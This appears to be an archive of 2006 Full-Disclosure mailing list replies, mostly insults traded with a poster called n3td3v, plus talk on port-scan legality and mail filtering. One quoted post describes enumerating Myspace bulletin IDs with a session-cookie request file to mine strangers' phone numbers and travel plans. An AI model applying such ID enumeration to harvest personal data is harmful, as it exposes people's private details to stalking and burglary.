Re: [Full-disclosure] Re: Security researcher
How can you compare gobbles with n3td3v thats blasphemy ! - Original Message - From: Thierry Zoller [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; pen-test@securityfocus.com; [EMAIL PROTECTED] Sent: Friday, August 25, 2006 10:40 PM Subject: Re: [Full-disclosure] Re: Security researcher Dear Denis Jedig, DJ Gobbles? The [EMAIL PROTECTED] The DJ Netdev-counterpart-on-bugtraq-some-years-ago-Gobbles? Him a security DJ researcher? Made my day. You just made mine, Goobles released the finest exploits, some 0-day some BSD ones which where claimed to be impossible to do, and his comments in the exploits were quite entertaining. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Data Mining Myspace Bulletins
Couldn't you have used sockets? Its just a simple connect() whats the big deal..Using netcat trusting the env and using system() is baaad :-) - Original Message - From: John Hackenger [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Saturday, July 01, 2006 12:38 AM Subject: [Full-disclosure] Data Mining Myspace Bulletins Myspace Bulletins: The good, the bad, and the ugly Data Mining Myspace, a case study Author: stderr ([EMAIL PROTECTED]) http://stderr.linuxinit.net Original release: http://www.pandora-security.com -- 1. Abstract We all know about myspace.com, and I'll go ahead and admit that I actually have an account to keep up with friends. Myspace is full of a bunch of idiots, but it can be a great tool for keeping up with people... when used properly. Myspace has long been a hacker playground, you may remember the infamous Samy is my hero worm. The worm took advantage of several poor input validation techniques which were being employed. Each person that went to a page with his script in it, automatically sent him a friend request. After this alarming stunt, Myspace fixed a lot of the injection vulnerabilities. -- 2. Introduction to Bulletins On Myspace, you can send bulletins which are sent to all of the friends on your list. That way if you're going on vacation or something, you can let ALL of your friends know what's happening by sending only one message. Most people assume that only their friends can read the bulletins they post... they are sadly mistaken. When you open up a bulletin, you go to a url like the following. http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.readmessageID=1 Yes, you guessed it. If you change the messageID number, you can view any bulletin on Myspace that hasn't yet expired. Now, if we could just collect a ton of bulletins, then we could surely find some juicy information like cell phone numbers, when people are leaving for vacation, where they're going... the list goes on and on. The implementation of bulletins so that everyone can view them may be intentional, but most people assume that bulletins are only readable by friends. Because of this belief, many people post personal details in bulletins, never expecting people like you to read them. The mere existence of the Delete from friends button implies that only friends should be able to read your bulletins. -- 3. Mining the data I was able to whip together a small C program that generates urls, retrieves the bulletin, and saves the html to a file. Once all of the data has been downloaded, it's easy to parse through using a tool like grep. In order for this program to work, you need to download a tool called 'netcat'. You will also need to get your cookie once you're logged into myspace, so that you can view the bulletins. First of all, let's create a new file named request.txt The contents should look something like this, but you'll need to change the cookie to match yours. === Host: bulletin.myspace.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414 Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: TIMEZONE=3; ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4 A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83 5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x; NGUserID=a258ca5-2341-1231956342-6; MYSPACE=myspace; AUTOSONGPLAY=0; UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=; rsi_want=0; COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3 D%3D; MSCulture=IP=127.0.0.1IPCulture=en-USPreferredCulture=en-USCountry=US; MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda ALOAJKEIOAJF3ea:LKfoaidjiajsioajlk3jaijdkfhfkjghncx,jlkjaweoijroiajoijadsljfdlksajfij32lja;dljf aDJFOA:#oKkdjflkaj;ijIOJilj;ioje;ioHiuhNKJhUGJJikhiugygGTYFTJHKHIUgyuhihiugI:HUgugyfTHDGfyjgfff
Re: [Full-disclosure] Are consumers being misled by phishing?
Kiddie flaming mood? Yes thats when someone is in the mood to actually answer your stupid mails. Thats a very cheeky comment there. I guess you want people to think you know more than me. Well its not hard to know more than you. Actually about 99,9% of the people here on this list know more than you. You have no idea of the security business as you never worked in the field. You can not code nor are you very familiar with different hacking technics. All you ever do is playing with XSS and picking up well known or fake stories so you can try to get people to sign up for your stupid google group. Like last time you pretended people would get 0days if they sign up with you. Since you pretend to be the biggest group in the underground you should know that in the underground a XSS isnt even counting as 0day even on the fact its a private bug. Its people like me who are giving you people something to think about. More like, its people like you who make us laugh. If it wasn't for people like me, your job wouldn't be half as interesting. True that, we wouldnt have so much to laugh about :-) Its funny when someone without any clue steps up and tells the whole list how he'd be better as the people he secretly looks up to. Its not me who needs your books, we're the people giving people things to write into books and to publish on the web for people to google. Ah yes XSS for dummies. You never brought anything worth to write into a book. Why did you never write for phrack.org when it still existed ? Its not like you ever invented something new and XSS is the most easy thing you can do. Most security researchers dont even bother looking for it. Fair enough, you provided a XSS bug to make people aware of the problems. That would be ok if you wouldnt act like you would be the greatest hacker out there, since in fact you where never a hacker nor a security professional. You are just a rookie with too big of an ego. Once you can programm in C and provide the list with exploit code or new exploitation technics, then you can start to show off how great you are. Until then go back into your basement and stfu. - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, June 29, 2006 12:59 PM Subject: Re: [Full-disclosure] Are consumers being misled by phishing? On 6/29/06, Gadi Evron [EMAIL PROTECTED] wrote: I guess I'm in kiddie flaming mood this week. About time too, been a while. Kiddie flaming mood? I believe the industry coined up phishing to make more money out of social engineering. Its obvious now that both are over lapping. Only the other day Gadi Evron was trying to coin up a phrase for voice phishing. Why can't we cut to the chase and drop the (ph)rases and call it straight forward SOCIAL ENGINEERING. Hey there n3td3v team. I actually agree with you. Terming things with new names all the time is very annoying. Pharming is one good example. Its not about being annonying, its about misleading the consumer with catch phrases to describe social engineering. I guess when the annual revenuw from phishing for the mafia gets to 2 Billion USD, things get their own names. There are a million books on phishing in borders book store, if the phishing phrase hadn't been coined, a lot of people wouldn't be millionaires right now. They brought in phishing in 2003. The actual act of phishing had been going on for years before the phrase was coined. Since the beginning of Yahoo corporation there have been fake login sites, and people making voice-based social engineering attacks. Its as if the technique known as phishing wasn't around until the term phishing was coined. I can tell you phishing and voice phishing were around and known as social engineering and everyone was happy with that. Phishing hasn't increased since the term phishing was termed, it was as big an attack method as it is today, its only because of the term phishing being recently invented, that companies have decided to make money out of setting up honey pots to detect phishing and report that to the consumer and corporate scene, and offer security products to protect users against phishing attacks. (websense ring a bell?). The whole term phishing is purely for money making purposes , and to allow security product vendors to break down the techniques of social engineering, in able to allow them to make money out of breaking down different characteristics of social enginnering, to allow them to create a multi million pound market for each technique of social engineering, as if each technique of social engineering is a seperate attack method. which it isn't. The industry is now trying to break down social engineering further by claiming theres this new type of attack voice phishing or vishing as you call it, to enable a new multi million dollar book market for people to sell books at borders book store. The truth
Re: [Full-disclosure] researchers want slice of profit and vow pullout of mailing list disclosures
Thank you John! We appriciate your efforts as usually. Keep up the good work :-) Don't let such fools annoy you. Your doing a great job. -sk - Original Message - From: John Cartwright [EMAIL PROTECTED] To: internationalhackers [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Friday, June 23, 2006 5:03 PM Subject: Re: [Full-disclosure] researchers want slice of profit and vow pullout of mailing list disclosures On Fri, Jun 23, 2006 at 03:07:58PM +0100, internationalhackers wrote: john cartwright rejected our post to the full-disclosure mailing list in reply to the 'multiple yahoo vulnerability' advisory What, this one? http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047045.html don't be fooled by the unmoderated condition of the list, john cartwright has both our e-mail accounts on moderation. Yes, all of them, and this one too, now. we're not mentioning our alias, so we can beat the procmail filters, which have been setup by nasty individuals who constantly post to the list complaining about our posts, on an 'unmoderated mailing list'. As I pointed out in private email, the act of repeatedly registering accounts to bypass access control is blatant abuse, and a mail is on its way to your ISP. Read the charter. The list is unmoderated for those individuals responsible enough to handle that privilege, and there are still rules to be followed. You may post from your [EMAIL PROTECTED] account, moderated, until you learn to follow the rules. All other accounts registered by you or your group will be banned/moderated and followed up by an abuse report to your ISP, as promised. Keep up the recent on-topic behaviour (like the message that I supposedly rejected) and the moderation will be lifted. Your choice. Cheers - John ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] terrorists have invaded the united states
or you just put [EMAIL PROTECTED]ERROR:550 piss off in /etc/mail/access if you use sendmail - Original Message - From: Byron Sonne [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Sunday, June 11, 2006 6:16 PM Subject: Re: [Full-disclosure] terrorists have invaded the united states Why don't you folks just put up some filters for 'n3td3v'? I did months ago along with everyone else I know and it's been a blessing. Either fire up firefox and add the filter, or locate your msgFilterRules.dat and add this (change the to your username, duh): name=n3td3v crap enabled=yes type=1 action=Move to folder actionValue=mailbox://[EMAIL PROTECTED]/Trash condition=OR (subject,contains,n3td3v) OR (from,contains,n3td3v) OR (to or cc,contains,n3td3v) OR (body,contains,n3td3v) The condition line should be a single line, but my mailer wraps it. Problem solved. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] scanning
When you say that by running a portscan you dossed a whole network then i would say either you are crazy or your portscanner is seriously broken lol I have been doing pen-tests since 1998 and never ever dossed a whole Network by accident, especially not with a simple portscan. -sk - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Monday, June 12, 2006 11:23 AM Subject: Re: [Full-disclosure] scanning --- [EMAIL PROTECTED] wrote: What's this mean? It means that if you scan some lame-ass system and it crashes as a result, you might be in deep shit. And it shouldn't have crashed from a portscan does *not* hold up in court. Having done pen-testing in the past I have disabled (dos-ed) systems and entire networks with a portscan. My employer would never let me do any work withaout a prior written agreement. However, law is highly fluctuate over time and from country to country. Dutch law recently changed. In the past you had to have broken a security barrier in order to be accused of hacking, now it has changed to with the intent to do harm. Is it illegal? Not enough data to compute / that is one for the lawers... Is it unwise? Probably... Will you get cought/sued? Unlikely... Would I bother to sue you? No... Schanulleke ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: re : [Full-disclosure] n3td3v agenda revealed
Hello David, while your intentions are nice, you wont have much luck, as he wont listen. In his universe he thinks he is the king. Its a mental problem and you cant help him. All we can do is see it with humor :-) afterall he is pretty entertaining. EVERYONE here knows that n3td3v is just some lame kid trying to get attention, yet he still belives that people actually listen to him, or belive him that he would have 0days. Regards, sk - Original Message - From: David Alanis [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; n3td3v [EMAIL PROTECTED] Sent: Saturday, June 03, 2006 3:09 PM Subject: Re: re : [Full-disclosure] n3td3v agenda revealed n3td3v: You seem to have multiple personalities. You sure spill a lot of gibberish here and many places. I have tried blocking your e-mails and you still get through. May I please recommend for you to take one step back and collect your thoughts next time you respond to another e-mail. I don't know you personally, from reading your e-mails I would not go out of my way to do so if we happen to be in the same place (DEFCON, Blackhat)Although, this mailing list is open to those who wish to participate openly about computer security. I have not seen any positive contributions from you since I joined. Please, please, keep your negative, rude, immature, and lame comments to your self. Trust me bud, you will feel better once you see positive comments about you or positive contributions on your behalf. P.S. Let me beat you on this one here's another f'ing moron who has never found their own vulnerability, talking f'ing shit - n3td3v 2006 David On Saturday, June 03, 2006 6:35 AM, n3td3v wrote: Date: Sat, 3 Jun 2006 12:35:50 +0100 From: n3td3v To: full-disclosure@lists.grok.org.uk Subject: Re: re : [Full-disclosure] n3td3v agenda revealed On 6/3/06, Anil Gulecha [EMAIL PROTECTED] wrote: LOL Hi, You're the kind of person who laughed when there were people planning to throw planes into the world trade center, then after it happened you still laughed. It is kind of why cyber security is in the same sorry ass state as mainland security is right now. Regards, n3td3v ___ Full-disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds - Einstein Cuanta estupidez en tan poco cerebro! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] scanning
Blacklist all .br/.kr/.jp/.cn IPs on your firewall already is what I say. That would work for your home computer, but on a business server not a very bright idea. Is it illegal if I perform a vulnerability scan on a site without permission from the owner? How about a simple port scan? thanks.. As far as i know (and i'm very sure about that), vulnerability scans are illegal in most countries, at least in those that have computer laws. Especially if you use something like CoreImpact or Canvas, since they actively exploit a vulnerability, resulting in illegal access to the System. A simple port scan however, is most likely not illegal, since all it does is see what public services a server may offer. I never heard of a single case where someone got sued for a simple port scan. -sk http://www.groundzero-security.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I'm ready to tell the police
and you really wonder why people blacklist your mails. - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, May 22, 2006 2:45 AM Subject: Re: [Full-disclosure] I'm ready to tell the police On 5/22/06, Michael Silk [EMAIL PROTECTED] wrote: yep, fd definately needs it's own tv show. i'd watch it ... You think this is a joke? n3td3v was never a joke, but everyone on fd treated it like one. We're the biggest group around of rogue employees at major internet companies aka dot-coms... i'm ready to walk upto my local police sation right now just get hand them in, i'm not having a major breakdown... ive known them for 7 years and now im ready to hand myself in and give evidence against these guys at yahoo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Disclosure Code of conduct
lol you are the one who only posts XSS, then finally get off this list kid. What did you ever post other than your lame XSS ? nothing so you can aswell finally unsubscribe as you told us 3-4 times ago, but you never did. We would enjoy seeing you unsubscribed. This is probably the last Mailinglist where you havent been banned yet. You just flame Securityfocus, because you are pissed that they don't allow you to post your nonsense. - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Sunday, May 07, 2006 4:20 AM Subject: Re: [Full-disclosure] Full Disclosure Code of conduct On 5/7/06, Aaron Gray [EMAIL PROTECTED] wrote: I am suggesting that we all cooperate and produce a Code of Conduct for participating on the Full Disclosure mailing list. Suggested start :- 1) No Swearing 2) No slagging others off 3) No selling of exploits and vulnerabilities Lets add: 4) No Cross-site scripting and SQL injection advisories. We get the picture, theres 100 million flaws for guestbooks/bulletinboards and other unheard of vendor products. Its time to kill the cross-site scripting and sql injection spam created by copy paste script kids. Let the lame Securityfocus Bugtraq mailing list get submitted with that B*S from now on. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Disclosure Code of conduct
The trolls arent't the problem, it's the retarded morons who keep responding to and arguing with them. So that means you too are a retarded moron ? - Original Message - From: Anders B Jansson [EMAIL PROTECTED] To: Full Disclosure full-disclosure@lists.grok.org.uk Sent: Sunday, May 07, 2006 3:09 PM Subject: Re: [Full-disclosure] Full Disclosure Code of conduct Aaron Gray wrote: I am suggesting that we all cooperate and produce a Code of Conduct for participating on the Full Disclosure mailing list. Suggested start :- 1) No Swearing 2) No slagging others off 3) No selling of exploits and vulnerabilities I have a much better list. 1. Use what ever fucking language you want. 2. Shut the fuck up unless you have something to contribute with. 3. DON'T FEED THE TROLLS. If someone posts something that you think sucks, then _mail that person_, you don't have to mail the list to state this. If you're right ,we already know, if you're wrong, you're just adding to the noise. The trolls arent't the problem, it's the retarded morons who keep responding to and arguing with them. -- // hdw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] shellcode study
erm what do you mean with "new" documents ? The old ones that cover shellcode, won't be any different to a "new" document. Its the same technics thereunless you want polymorphic shellcode. Just look at the phrack magazine, there you will find papers regarding shellcode. -sk Http://www.groundzero-security.com - Original Message - From: azrael goblin To: full-disclosure@lists.grok.org.uk Sent: Thursday, May 04, 2006 11:47 AM Subject: [Full-disclosure] shellcode study hi guys , I amlearning to writeshellcode now. can somebody supply some newshellcode documents ? btw,if someone need some ,i can supply some old documents.sorry for my poor eng. thx your, goblin ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MSIE Nested Object Vulnerability Is Exploitable
Ywwwnnn.. Does Secunia with their pathetic verification of advisories have any credibility left if you ever had any? Yes, at least people care about their information, while your Emails are just beeing ignored for the most time unless someone wants some cheap coffee break entertainment. I guess you still haevn't figured out how to exploit MZ's advisory then? As if you would know anything other than XSS so be silent. You have no idea of the nature of the vulnerabilities that are beeing discussed. So go back and research your childish scripting stuff and leave the real bugs to the skilled people. You guys have a lot going for you, and the fact you guys are sponsor of a major international mailing list is laughable. The fact that you still think people take you serious is laughable too. - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Sunday, April 30, 2006 12:14 AM Subject: Re: [Full-disclosure] MSIE Nested Object Vulnerability Is Exploitable On 4/28/06, Secunia Research [EMAIL PROTECTED] wrote: Hello, There has recently been some discussion regarding whether or not the MSIE Nested Object Vulnerability reported by Michal Zalewski is exploitable or not. Link to Michal Zalewski Full-Disclosure Posting: http://lists.grok.org.uk/pipermail/full-disclosure/2006- April/045422.html Because of this, Secunia has received several enquiries and comments about the Highly critical rating of this advisory (SA19762) as no proof of exploitation has been publicly disclosed. In response to this, we would like to stress that Secunia has developed a working exploit for this vulnerability. This exploit will not be disclosed publicly, but was sent to Microsoft on Wednesday 2006-04-26. The advisory rating of Highly critical and System access impact is therefore fully justified. Kind regards, Thomas Kristensen CTO Secunia Hammerensgade 4, 2. floor DK-1267 Copenhagen K Denmark Tlf.: +45 7020 5144 Fax: +45 7020 5145 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Rofl, So basically you're saying: Secunia Originally Believed MZ's vulnerability disclosure _was_ exploitable, but now you're saying, opps! Secunia made a mistake, the REAL professionals at Microsoft had to tell us infact,your so called exploitable MZ disclosure is now unrelated to MZ's advisory disclosure. So infact Secunia have just admitted they don't actually have a clue, and that your original MZ's vulnerability is exploitable is now void? Does Secunia with their pathetic verification of advisories have any credibility left if you ever had any? I guess you still haevn't figured out how to exploit MZ's advisory then? You guys have a lot going for you, and the fact you guys are sponsor of a major international mailing list is laughable. Regards, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MSIE Nested Object Vulnerability Is Exploitable
I wouldn't bet on that! I dont have to bet i know its a fact. I haven't forgot about the x-site scripting vulnerability you sent to my Yahoo Mail address to steal my cookie, but yeah, your secret is safe with me ;) Stop accusing me of such lameness. You think that will help you? I would never go down to that line since you are not worth my time. Besides of that, what would i want with your stupid yahoo account... I really couldn't care less. Your too funny. All you ever do is make up things to distract from the original topic. If people answer to you, they usually tell you to shut up, but you just keep blabbering and you said like at least 3-4 times that you would unsubscribe this list. I really wonder when you finally do that. We don't need trolls like you here who have no idea of the security business. That you never had a job as Security Researcher,Pen-teser,Admin or Programmer is very obvious and your hobby xss findings don't mean anything. Now YOU try and talk about the business your really hilarious :-) - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Sunday, April 30, 2006 1:19 AM Subject: Re: [Full-disclosure] MSIE Nested Object Vulnerability Is Exploitable On 4/29/06, GroundZero Security [EMAIL PROTECTED] wrote: You have no idea of the nature of the vulnerabilities that are beeing discussed. So go back and research your childish scripting stuff and leave the real bugs to the skilled people. Rofl, I wouldn't bet on that! As for the XSS, thats just for phun, to create a diversion. Regards, n3td3v I haven't forgot about the x-site scripting vulnerability you sent to my Yahoo Mail address to steal my cookie, but yeah, your secret is safe with me ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Groups e-mail disclosure in plain text
There is no such thing as public 0-day sources You don't even understand the meaning of 0day. As soon as some exploit hits the public, its not 0day anymore.. now please stop to spam FD with your nonsense. This is my last ever Full-Disclosure post... i'm no longer going to give Secunia the spam satisfaction of adding their web address to the bottom of my messages Thats like the 3. time you say you leave, why don't you just go then ? Stop crying about it and get lost. - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, April 19, 2006 8:09 AM Subject: Re: [Full-disclosure] Google Groups e-mail disclosure in plain text On 4/19/06, Randal T. Rioux [EMAIL PROTECTED] wrote: What does SF offer? People directly post to Securityfocus, it is an original source of information, whereas Please note: The information, which this Secunia Advisory is based upon, comes from third party Aka they sit on places like Securityfocus all day looking for advisories to republish and verify. I don't think the industry needs someone to verify an advisory for them. Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others. People are more than capable of doing that themselves, or do Secunia underestimate the intelligence of the security community? If we were to wait everytime for Secunia to harvest advisories from public 0-day sources, and verify them manually, then the internet would be shutdown by now. This is my last ever Full-Disclosure post... i'm no longer going to give Secunia the spam satisfaction of adding their web address to the bottom of my messages. Good bye to the All-New Secunia sponsored Full-dIsclosure mailing list. Please unsubscribe n3td3v_at_gmail and xploitable_at_gmail Thanks, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
The Advisory can be found here: http://www.g-0.org/code/rz2-adv.html Regards, GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Übermittlung unserer Daten für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4 BDSG). pub 1024D/69928CB8 2004-09-27 Stefan Klaas [EMAIL PROTECTED] sub 2048g/2A3C7800 2004-09-27 Key fingerprint = A93E 41F8 7E82 5F2C 3E76 41F1 4BCF 3096 6992 8CB8 -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9 UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+ xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6 LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2 tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7 HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0 SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G 4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1 Ow== =E0o1 -END PGP PUBLIC KEY BLOCK- Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder von Teilen dieser E-Mail ist nicht gestattet. This E-mail might contain confidential information. If you are not the right addressee or you have recived this Mail in error, please inform the Sender as soon as possible and delete this E-Mail immediately. You are not allowed to make any copies or relay this E-Mail. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Invisionzone.com board hacked...and Invisionwon't do a thing...
